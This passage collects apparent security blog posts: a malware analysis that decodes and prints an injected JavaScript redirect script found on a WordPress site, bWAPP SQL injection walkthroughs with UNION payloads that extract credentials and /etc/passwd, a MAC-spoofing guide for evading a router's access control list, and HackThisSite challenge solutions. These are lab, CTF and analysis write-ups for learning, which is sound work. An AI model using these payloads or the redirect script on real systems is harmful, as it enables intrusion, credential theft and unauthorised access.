MC09Jx8iYw4BPTQtHGgMIj8vGC0wcVBmQGcuEx04LCpQfWFna0tZLzQrWSU0MSoHDDx1ZFkjGCQqGxxxIzgVMw5ua0BZcX08ASIKPjhLRGR1NwwqB25rVFl7d3lDZkl8aw4BKTwrHDVWZWtAWTwtPRgyDmk/BCwNFgoNNAIpLENQcG5TWWZLZy8EGiw4PBcyRSQkBBIwMHlEZggYJQoUPHVyWWRWZWtAWToKLxgqHiJwYVl5KFNzZkshPgUaLTw2F2YILy4IEho6NhIvDm9iSwJTdXlZZgIha0MVNjY4FRUfKDkKHjx7PhwyIjMuBlF+LAATNApzGygaYT40Ow4ONDhaEDtycFl7VnprTEh+fHkCTEtna0tZeSc8DTMZKWsfCywwYnNmS2drFlk8OSocZhBNa0tZeXV5FSkIJic4DTYnOB4jRTQuHzAtMDRRYRIeIRkYbQUaGn4AKgkjHComaBAkTGtrTEh+fGJzZktnaxZzeXV5WTAKNWsZHD8wKwsjGRUuDxArMDoNBQQoIAIceWh5HiMfBCQEEjAwcVs0DiEuGQs8JwscIgI1LggNGjo2Ei8OZWJQc3l1eVkvDWdjGRw/MCsLIxkVLg8QKzA6DQUEKCACHHl0ZFkoHisnS19/dSscIA41OQ4LCzA9EDQOJD8oFjY+MBxmSnprSVtwdSJzZktna0tZKzAtDDQFZz8ZDDxuU1lmS2c2Sxw1JjxZLw1nYw8WOiA0HCgfaSgEFjI8PFcvBSMuEzY/fX4OKRkjOxkcKiYGFSkMIC4PXnB1eER7S2p6YXB5dXlZZktnNxdZPTo6DCsOKT9FGjY6MhAjRS4lDxwhGj9RYRw3ZhgcLSEwFyEYYGJLWGRoeVR3YWdrS1l5dXlZZktna0tZeSklWSIEJD4GHDchdxopBCwiDlcwOz0cPiQhY0wONic9CTQONDg0DTwmLV5vS2Z2Vll0ZHBZZhBNa0tZeXV5CyMfMjkFWS0nLBx9YWdrS1kkdTwVNQ5nMGFZeXV5WWYYIj8oFjY+MBxuSTUuDRwrJzwLFA4jIhkcOiEaFikALi5JVXl3PRZmBSg/Sws8MTALIwgzaUdZbmZpUH1hZ2tLWXl1KxwyHjUlSx84OSocfWFna0tZJF95WTthTTZhc1NfLxg0SzUuCh0gBi0YMg4EIw4aMhw3DSMZMSoHWWR1KhwyIik/DgsvNDVRIB4pKB8QNjtxUGYQTWtLED91cR0pCDImDhcteyscJw8+GB8YLTB5RHtWZ2wIFjQlNRwyDmBBS1l5dXlZOhdnLwQaLDg8FzJFNS4KHSAGLRgyDmd2Vll+PDcNIxkmKB8QLzB+UGYQTWtLWXk2NRwnGQ4lHxwrIzgVbhkiKg8ACiE4DSMoLy4IEhA7LRw0HSYnQkJTdXlZZhgzKhkNcXxic2ZLOkEWVXlkaVB9YWhkV1YqNisQNh95QWE=';
function xor_enc(string, key) {
  var res = '';
  for (var i = 0; i < string.length; i++) {
    res += String.fromCharCode(string.charCodeAt(i) ^
                                key.charCodeAt(i % key.length));
  }
  return res;
}

var dec = xor_enc(atob(enced), key);
(new Function(dec))();

When I saw this, I knew this was the last bit of de-obfuscation I had to do. When I looked at the for loop, the “^” character caught my attention. In Javascript, the caret is used for XOR, or Exclusive OR. This is a very interesting cipher. After brushing up on some XOR logic, I was able to decode the above even further since I was given the key.

//<script>
var w_location =
      '/?pagerd_' + Math.random().toString(36).substring(7);

function start() {

  var from = document.referrer;
  var i;

  if (checkCookie()) {
    return;
  }
  var uagent = navigator.userAgent;
  if (!uagent || uagent.length == 0) {
    return;
  }
  uagent = uagent.toLowerCase();
  if (uagent.indexOf('google') != -1 || uagent.indexOf('bot') != -1
      || uagent.indexOf('crawl') != -1) {

  } else {
    if (window.history && window.history.length > 2) {
      window.location = w_location;
    }
  }

  function getCookie(c_name) {
    var c_value = document.cookie;
    var c_start = c_value.indexOf(" " + c_name + "=");
    if (c_start == -1) {
      c_start = c_value.indexOf(c_name + "=");
    }
    if (c_start == -1) {
      c_value = null;
    }
    else {
      c_start = c_value.indexOf("=", c_start) + 1;
      var c_end = c_value.indexOf(";", c_start);
      if (c_end == -1) {
        c_end = c_value.length;
      }
      c_value = unescape(c_value.substring(c_start, c_end));
    }
    return c_value;
  }

  function setCookie(c_name, value, exdays) {
    var exdate = new Date();
    exdate.setDate(exdate.getDate() + exdays);
    var c_value = escape(value) + ((exdays == null) ? "" : "; expires=" + exdate
.toUTCString());
    document.cookie = c_name + "=" + c_value;
  }

  function checkCookie() {
    if (localStorage.getItem('yYjra4PCc8kmBHess1ib') === '1') {
      return true;
    } else {
      localStorage.setItem('yYjra4PCc8kmBHess1ib', '1');
    }
    var referrerRedirectCookie = getCookie("referrerRedirectCookie");
    if (referrerRedirectCookie != null && referrerRedirectCookie != "") {
      return true;
    } else if (document.cookie.indexOf('wordpress_logged') !== -1
               || document.cookie.indexOf('wp-settings') !== -1
               || document.cookie.indexOf('wordpress_test') !== -1)  {
      return true;
    } else {
      setCookie("referrerRedirectCookie", "do not redirect", 730);
      return false;
    }
  }

}



var readyStateCheckInterval = setInterval(function() {
  if (document.readyState === 'complete'
      || document.readyState == 'interactive') {
    clearInterval(readyStateCheckInterval);
    start();
  }
}, 10);
//</script>

This is where the fun begins. With the raw HTML code, I would be able to trace back the origin of this malware. That being said, lets take it from the top and analyze the code. The first thing that stood out to me was the '/?pagerd_' + Math.random().toString(36).substring(7); variable declaration. If the right conditions are met (more on this in a bit), the page will load a random string to cause a redirect. Any of these could be:

  • /?pagerd_lmdpmp
  • /?pagerd_xqb1fk5
  • /?pagerd_zj91e5

and so on. Let’s look at the conditions that will not trigger a redirect.

  • If your User Agent is “google”, “bot”, or “crawl”.
  • If you have the key “yYjra4PCc8kmBHess1ib” in your browser’s localStorage (in case you have gotten infected in the past).
  • If the cookies wordpress_logged, wp-settings, wordpress_test, have been set.
  • If the cookie “referrerRedirectCookie” exists.

When I first visited the site on a virtual machine, I closely observed at the requests that were being exchanged and I noticed a pattern on two accounts with different browsers. A brief redirect appeared on the URL of my browser. Because I saw the correlation in different browser types, I decided to run Live HTTP Headers to catch the request. To no surprise, I found the redirected site.

Please proceed to the following links at your own risk, as the links could still be active upon the publication of this article. I decided to take the bait and go to http://gakno.com.mx/css. This domain could be a relay for this attack as I was finally redirected to http://lovewe.com. The Gakno domain appeared to be a normal site. Either the attacker did a good job at masking a relay or the web admin for the infected domain really is clueless on what is going on.

Upon landing on LoveWe.com, it seems to be a dating site. If you closely examine the source code, you will notice that your location is being tracked for certain date matches (can we expect any less from a dating site?). It is not out of the ordinary for sites track user location for demographic purposes, so this part did not peek my interest.

function GetParam(name) {
            var match = new RegExp(name +
                "=*([^&]+)*", "i").exec(location.search);
            if (match == null)
                match = new RegExp(name + "=(.+)", "i").exec(location.search);
            if (match == null) return null;
                match = match + "";
            //**convert match to a string
            result = match.split(",");
            return decodeURIComponent(result[1]);
        }

        function logStatus(type) {
            $.ajax({
                cache: false,
                global: false,
                async: true,
                type: "POST",
                url: '/logpstatus.php',
                data: {uid: GetParam('uid'), type: type}
            });
        }

What did have me concerned was some hidden frames on the site.

  <frameset cols="1,*,1" border=0>
        <frame name="top" src="tg.php?uid=lovewe5904193acc90f4.52881511" scrolling=no frameborder=0 noresize framespacing=0 marginwidth=0 marginheight=0>
        <frame src="search_caf.php?uid=lovewe5904193acc90f4.52881511&src=mountains&abp=1" scrolling="auto" framespacing=0 marginwidth=0 marginheight=0 noresize>
        <frame src="page.php?lovewe5904193acc90f4.52881511"></frame>
    </frameset>
    <noframes>

One of the frames that caught my attention was the page.php frame. Looking at the source, it writes img.php as an image, however, the .PHP exention is suspicious since its not an image type. I am not entirely sure what this file does since I cannot break it down any further and PHP code can only be seen by having access to the actual file. Inspecting these other PHP files, you will see some basic info gathering.

Conclusion

Overall, it looks like these attacks are related to improve SEO ranks and site promotion. Throughout all my digging, I located the attacker to reside in Mount Laurel, NJ. We will never know what purpose your information will serve malicious users, but this expedition has assured me that not even marketing giants are safe from malware and infection.

For the individuals that are curious, the site that was initially infected never sent out any messages to its customer about the infection and a potential breach. This goes to show how dark humans are to cover their own unethical responsibilities. Money != security, on the contrary, the bigger and more robust your systems are, the higher the risk for a potential flaw to exist is. Security through obscurity, anyone?

Stay educated and informed, my friends, until next time – Happy Hacking!

bWAPP SQL Injection (SQLite)

Introduction

Hi again. Today I have decided to document yet another unpublished challenge presented in bWAPP. This challenge concerns SQL Injection while the server uses the SQLite engine.

I will try to make this post relatively short, explaining the following:

  • Getting To Know Our Target
  • Finding Database Information (tables/columns/sqlite version)
  • Extracting Database Information
  • Last Words

Getting To Know Our Target

On this section of this thread, I want to spend some time talking about finding the SQL Injection vulnerability that exists and also some prep work that has to be done to get to our working injection.

This challenge has a very similar layout as the previous bWAPP challenge I posted; it allow users to search for movies titles. The vulnerability in itself is not difficult to find. Placing an apostrophe in the search string will induce an error:

sqlite_error

The page reveals a vague “Error: HY000” error message. I spent a few moments searching on Google for relevant results, but the information I was coming across not very useful. I am fairly confident in exploiting SQLi vulnerabilities, so I approached this challenge as I normally would.

The first step I took was to find out how many columns existed in the table that used in my query. The only problem with this error message is that it was not very informative in any way. I knew that any syntax error or incorrect information that I sent was going to produce this error. Using ORDER BY helped me get one step closer to the solution.

iron’ order by 300– <– Error: HY000
iron' order by 1– <– No error

I knew this was the path to exploitation and that my thoughts were on the right track. Few instances later, I discovered that there were 6 columns.

sqlite_columns

This was the preparation I required before I could proceed discovering more information about the database. This will be the transition to our next topic.

Finding Database Information (tables/columns/sqlite version)

Before I started to inject this web page, I knew what kind of information I was looking for. The issue was, I was not familiar with SQLite syntax. After looking at some SQLite documentation, I gathered enough information to know how to concatenate strings, find the SQLite version, and obtaining the tables and columns.

The following injections demonstrate the aforementioned concepts, thus completing the challenge.

Finding SQLite version:

'union+select+1,2,sqlite_version(),4,5,6--+-

sqlite_version

Finding database tables:

'union+select+1,2,name,4,5,6 from sqlite_master--+-

sqlite_name

This next injection will demonstrate how to retrieve the DDL statements used when creating the tables for the database. This will effectively reveal the tables and columns. The injection follows:

'union+select+1,2,sql,4,5,6 from sqlite_master--+-

sqlite_sql

The above image depicts the information needed; the login and password columns for the users table.

Extracting the login and password from the users table:

union+select+1,2,login||":"||password,4,5,6 from users--+-

sqlite_data_extraction

SQLite uses “||” as the operator to concatenate strings together. In this case, we are joining the login and password with a colon.

Last Words

This concludes this thread. As always, I really hope that you can take something from this reading. Although SQLite is not as popular as other RDBMSs, information disclosure can still be achieved via SQL injection.

Happy hacking!

bWAPP SQL Injection (AJAX/JSON/jQuery) Challenge

Introduction

On this thread, I will be posting the solution to the SQL Injection (AJAX/JSON/jQuery) challenge that can be found on the vulnerable bWAPP virtual machine. I have decided to post the solution because I could not find one available online.

This documentation will demonstrate how to exploit SQL injection flaws with the involvement of web technologies such as AJAX, JSON, and jQuery. I will be using the Burp Suite to intercept the requests being sent from my web browser and modifying them to test for vulnerabilities.

Tools being used:

Description Download
bWAPP http://www.itsecgames.com/
Burp Suite https://portswigger.net/burp/download.html

Getting To Know Your Target

This challenge starts off with with a search feature that can pose a potential threat to the web application. As users type in the search bar, movies begin to populate in a table according to what is being searched. This challenge is distinct from other SQLi challenges because the use of AJAX and JSON provides a real-time feed of the information begin requested. The images below captures this concept.

Screenshot from 2016-05-05 17:00:53

Screenshot from 2016-05-05 17:01:01

Tampering with the URL to generate an SQL syntax error will not be possible with this challenge.

nosqlierror

That being said, it is a good idea to intercept the client’s request and server’s response to get a better picture of how this application is working. Let’s see what happens when an apostrophe is inserted in the request.

Screenshot from 2016-05-05 17:05:05

A SQL syntax error is now apparent, being a good indication of an SQLi flaw. Now that we found our injection point, formulating working injection that will be able to speak to the database is our next step. When I was first attempting to solve this challenge, I tried many injections to no avail. It was very obvious to me that I needed a better understanding on what the SQL code in the background was doing, which transitions us to our next topic of discussion.

Analysing SQL Code For Flaws

Fortunately, we are given access to the bWAPP virtual machine. Soon I found the SQL code that was managing my requests to be the following:

$sql = "SELECT * FROM movies WHERE title LIKE '%" . sqli($title) . "%'";

Screenshot from 2016-05-05 17:07:12

I never thought that I would be tampering with the SQL LIKE statement. My mind quickly simplified this code and wrote it down to start developing a working syntax to exploit the application:

$sql = "SELECT * FROM movies WHERE title LIKE '%iron%'";

I knew that essentially the above code was the request that was being interpreted.

Finding a Working Injection Point

Now that I understood the query being used, it was time to start testing some of my suspicions.

The search feature offered by this challenge allows users to search for any movie titles as it automatically populates the results. For example, you can search for Iron Man or Terminator, but the results can’t never yield both; unless we inject an extra LIKE statement.

In theory, we can get both movies to show up with the following injection:

iron%' or title like '%term

This will make the back-end SQL code look like this:

$sql = "SELECT * FROM movies WHERE title LIKE '%iron%' or title like '%term%'";

Screenshot from 2016-05-05 17:08:21

As anticipated, the search results contained both movies.

Extracting Database Information

Now that I had a working injection, I had to figure out how many columns exist in the Movies table. This missing portion of the puzzle was discovered by looking at the server’s response:

[{“0″:”2″,”id”:”2″,”1″:”Iron Man”,”title”:”Iron Man”,”2″:”2008″,”release_year”:”2008″,”3″:”action”,”genre”:”action”,”4″:”Tony Stark”,”main_character”:”Tony Stark”,”5″:”tt0371746″,”imdb”:”tt0371746″,”6″:”53″,”tickets_stock”:”53″}]

You can see that there are 7 columns based on the data. This was my opportunity to start extracting some information from the database and files from the server. This injection was very tricky because it only works as I will shortly demonstrate. Some of the injections I could get it to work with commenting out the code at the end, and other injections would work without commenting out the code at the end. This is strange to me because the last statement in the request was needed to complete a true statement. I’m not an SQL expert so I can live with this mystery.

Finding database version():

iron%'+union+select+1,version(),3,4,5,6,7+and'%'='

Screenshot from 2016-05-05 17:10:03

The tables can be found with the following injection:

iron%'+union+select+1,group_concat(table_name),4,5,6,7+from+information_schema.tables+where+table_schema=database()--+and'%'='

The columns for the users table can be extracted with the following injection:

iron%'+union+select+1,group_concat(column_name),4,5,6,7+from+information_schema.columns+where+table_name='users'--+and'%'='

Extracting login and password from database along with /etc/passwd file:

iron%'+union+select+1,group_concat(login,0x3a,password),load_file('/etc/passwd'),4,5,6,7+from+users--+and'%'='

Screenshot from 2016-05-05 17:56:25

Last Words

The key to completing this challenge rests within figuring out a way to inject the LIKE statement. Finding the vulnerability in this challenge was not difficult, but most of my time was spent discovering a working injection.

Hopefully you have learned something from this short reading. If you have any suggestion on what topics to cover or discuss next, please let me know.

Happy hacking!

Bypassing Router’s Access Control List (ACL)

Introduction

Today I will be discussing a very simple concept to get around Access Control Lists using Ubuntu, although it is also possible though Windows. ACLs can be used to enforce network security by limiting portions of your network devices can access or even limit access to the internet. They are put in place to seclude hosts from certain parts of your enterprise or from accessing private infrastructures.

Modern home routers (or modem/router combos) include a basic Access Control feature to prevent users accessing the web. Depending on the router, time and dates can be configured to prevent devices from using the internet.

The following sections will cover:

  • Understanding The Router’s ACL Logic
  • Enabling ACL On The Router
  • Changing Interface MAC Address
  • Conclusion

Understanding The Router’s ACL Logic

Before we continue in discussing how to bypass ACLs on your home network, it is important to understand how the technologies in play function. This will provide us with more insight to why what we are doing works.

An Access Control List blocks devices based on their IP address. Router’s are considered layer 3 devices, meaning that they handle IP packets and pass it down to other layers for processing through encapsulation. Your home router keeps an ARP table that associates every IP address with its corresponding MAC address. When a request is being made from a device that has been blocked, the router inspects the packets and analyses the source IP address. If the source IP address match what is on its ACL, then the traffic is blocked.

When new devices join a network, and the MAC address is not associated with any IP address, the new machine is given an unused IP address. It is to say, that changing your MAC address will allow DHCP to provide your interface with a new IP address, therefore circumventing the applied restrictions.

Enabling ACL On The Router

Many routers have unique builds. Enabling Access Controls may differ from router to router but the concept behind them are similar. The device that will be blocked for demonstration purposes owns the IP address 192.168.0.16.

Enabling Access Control

Once this restriction is put in place, browsing the web will not be possible:

ACL in effect

ACL in effect

Changing Interface MAC Address

Changing your interface’s MAC address is very simple. I will be using a utility called MacChanger to spoof my MAC address. Please keep in mind that you can use built-in tools such as ‘ip’ and ‘ifconfig’ to change your MAC address. In Windows, you will need to change your adapter’s configuration. The changes that you make to your burned-in address will not persist across reboots.

It is always good practice to take note of your current MAC address just in case it is needed for another time. The following steps will guide you in installing MacChanger, obtaining your interface’s MAC address, brining your interface down, changing your MAC address, then brining your interface up to obtain a new IP address.

You can install MacChanger with the given command below:

sudo apt-get install macchanger

The following image displays our interface’s status (UP), IP address, and MAC address:

ifconfig wlan0
macchanger --show wlan0
ip a | grep wlan0

interface details

You will need to bring your interface down before you can proceed in acquiring a new MAC address.

ifconfig wlan0 down

After that is done, we can continue. I will be changing my MAC from “74:e5:43:30:78:a7” to “74:e5:43:30:78:a1”:

macchanger -m 74:e5:43:30:78:a1
ifconfig wlan0
ifconfig wlan0 up

Changing MAC address

It is important to keep in mind that brining your interface UP while it has a the old IP address with the new MAC address will cause conflict in your home network. In turn, you will be disconnected from the access point. Make sure that you are disabling and enabling your wireless after bringing your interface UP. This will allow the router to provide you an unused IP address for the new MAC address when you are re-authenticated to your wireless access point.

At this time, the new IP address is 192.168.0.14. We can confirm that the ACL in place for our device has been evaded:

ACL bypassed

Conclusion

Overall, understanding the conventions that rule your devices can be a powerful instrument. To recapitulate, bypassing your home router’s ACL can be accomplished by changing your MAC address in order to obtain a new IP address.

Hopefully everyone was able to take something with them after reading. If you would like any type of topic to be covered, do not hesitate to ask.

Happy hacking!

HackThisSite Basic Challenges 1-5

Introduction

In this post I will be documenting most of the Basic Challenges found on HackThisSite.org. Completing these challenges will give you a very basic overview of HTML and Javascript Injection. The rest of the challenges will be documented in another post.

Basic – Level 1

Description: This level is what we call "The Idiot Test", if you can't complete it, don't give up on learning all you can, but, don't go begging to someone else for the answer, thats one way to get you hated/made fun of. Enter the password and you can continue.

The purpose of the first challenge is to test your HTML knowledge. Although nothing appears to be visible on the page, the password is commented out on the source code using Javascript. Inspecting the source is how this challenged will be solved.

<!-- the first few levels are extremely easy: password is 488918f4 -->

 

Basic – Level 2

Description: Network Security Sam set up a password protection script. He made it load the real password from an unencrypted text file and compare it to the password the user enters. However, he neglected to upload the password file...

This challenge will force you to comprehend the scenario that is being presented. Because Sam forgot to upload the password file, the password is going to be blank.

Basic – Level 3

Description: This time Network Security Sam remembered to upload the password file, but there were deeper problems than that.

This challenge will once again test your knowledge on basic HTML. Every form in HTML is enclosed within tags. Inspecting the source code of this form will provide an attacker with more insight:

<form action="/missions/basic/3/index.php" method="post">
<input type="hidden" name="file" value="password.php" />
<input type="password" name="password" />
<input type="submit" value="submit" /></form>

The action will tell the form where to go next once the form is submitted. The method is how this information will be transmit, $_POST suggest that the information will be sent to the server for interpretation, and $_GET suggests that there will be information that will be obtained from the server. In this case we will be sending the password.

It is important to understand how forms are made in HTML to complete this challenge. tags tell the form if the characteristic of a field is going to be a text box, a radio button, a text area, etc. This feature is denoted by type . The values can be “text” for text boxes, “password” for input to be obfuscated, and “hidden” for the field to be hidden. The name field in a form gives that input type a unique name, this is useful when using DOM because it knows how to access those specific fields using their given name. This becomes useful when utilizing Javascript injection (more ahead about this). The value is simple a name that shows up as a description of what that field is.

The page for this challenge only shows ONE text box, but as you can see there are TWO shown on the source. You can change the value “type” to “text” to show this form.

Although this does not do much but show the extra text box, it is interesting to see the value of this field – password.php. This challenge is highly unrealistic but it tells us the file where the password is stored. Pointing your browser to https://www.hackthissite.org/missions/basic/3/password.php solves this challenge.

Basic – Level 4

Description: This time Sam hardcoded the password into the script. However, the password is long and complex, and Sam is often forgetful. So he wrote a script that would email his password to him automatically in case he forgot. Here is the script

I found this challenge to be interesting because it can be completed in more than one way. One way is by using your knowledge on HTML, which is the easier way out of the two, and the second one is by using your knowledge on Javascript, which can be accomplished by using Javascript Injection to modify form values. Lets take a look at both these methods. The first method will cover HTML.

Method One – Editing HTML.

Lets begin by taking a look at how the form is set up in the source code:

<form action="/missions/basic/4/level4.php" method="post">
<input type="hidden" name="to" value="sam@hackthissite.org" />
<input type="submit" value="Send password to Sam" />
</form>

<b>Password:</b>
<form action="/missions/basic/4/index.php" method="post">
<input type="password" name="password" />
<input type="submit" value="submit" />
</form>

This method is very similar to challenge 3, where there is a hidden form in the source. If you pay attention to the second line of the source code above, you will notice that the password is being sent to sam@hackthissite.org. This is the value that we need to edit. By changing the input type to “text” will cause the field to appear on the page; allowing you to edit the email and submit the form, concluding this challenge:

Method two – Javascript Injection.
The last method to solve this challenge is by editing the form my tampering with the elements with Javascript. Lets revisit our source code:

<form action="/missions/basic/4/level4.php" method="post">
<input type="hidden" name="to" value="sam@hackthissite.org" />
<input type="submit" value="Send password to Sam" />
</form>

<b>Password:</b>
<form action="/missions/basic/4/index.php" method="post">
<input type="password" name="password" />
<input type="submit" value="submit" />
</form>

In order to pull this attack off, it is necessary to understand how javascript handles forms. Every form in Javascript is contained in an array called forms[x], where x is the number of forms on the page starting from zero. This is important for this challenge because the value that we want to edit on this page is on the first form, therefore in our injection point, we will be using forms[0]. Changing the value of sam@hackthissite.org can be accomplished in two ways. The first is accessing the name of the input type and inserting our own value, and the second way is by modifying the element that corresponds to that value and inserting our own.

Lets take a closer look at our code:

<input type="hidden" name="to" value="sam@hackthissite.org" />

If we wanted to get the value of this field, our injection becomes:

javascript:alert(document.forms[0].to.value);

Everything on this injection is derived from the code that was supplied at source. forms[0] is included because its the first form, and “to.value” is included because to is the value of the field’s name. Inserting the above injection in the URL will display “sam@hackthissite.org”.

At this point we can specify the value for this field with:

javascript:alert(document.forms[0].to.value="yourEmail@gmail.com");

In order to pass this challenge, you need to send the password to the email you registered on HTS.

The last method to finish this challenge is by modifying the element that corresponds to that value and editing it. To accomplish this, we first need to understand what are elements when it comes to javascript. An HTML element is an single component of a form. These components represent a value within the forms, they can represent values throughout the entire markup. Take a look at the source code below provided by the challenge:

<input type="hidden" name="to" value="sam@hackthissite.org" />
<input type="submit" value="Send password to Sam" />

There are two values for the input tags, the first value is the email – sam@hackthissite.org, and the second value is “Send password to Sam”. We can use their elements to change their values. We will grab the first available element and see the value. This can be done with:

javascript:alert(document.forms[0].elements[0].value)

The page will display an alert box that says “sam@hackthissite.org”. If we change the value of our element to 1:

javascript:alert(document.forms[0].elements[1].value)

The page will display an alert box that says “Send password to Sam”. From here you can change the value of the email using its element to complete the challenge:

javascript:alert(document.forms[0].elements[0].value="yourEmail@gmail.com")

Concluding the challenge in two different ways.
 

Basic – Level 5

Description: Sam has gotten wise to all the people who wrote their own forms to get the password. Rather than actually learn the password, he decided to make his email program a little more secure.

This challenge is very similar to the previous challenge, I was not sure if there was suppose to be a difference, however, I did complete it the same way as challenge 4.

javascript:alert(document.forms[0].to.value="yourEmail@gmail.com")

I will conclude the first few challenges here and document the rest another in another post. This thread will be updated with a continuation link to the next challenges.

Thank you for reading!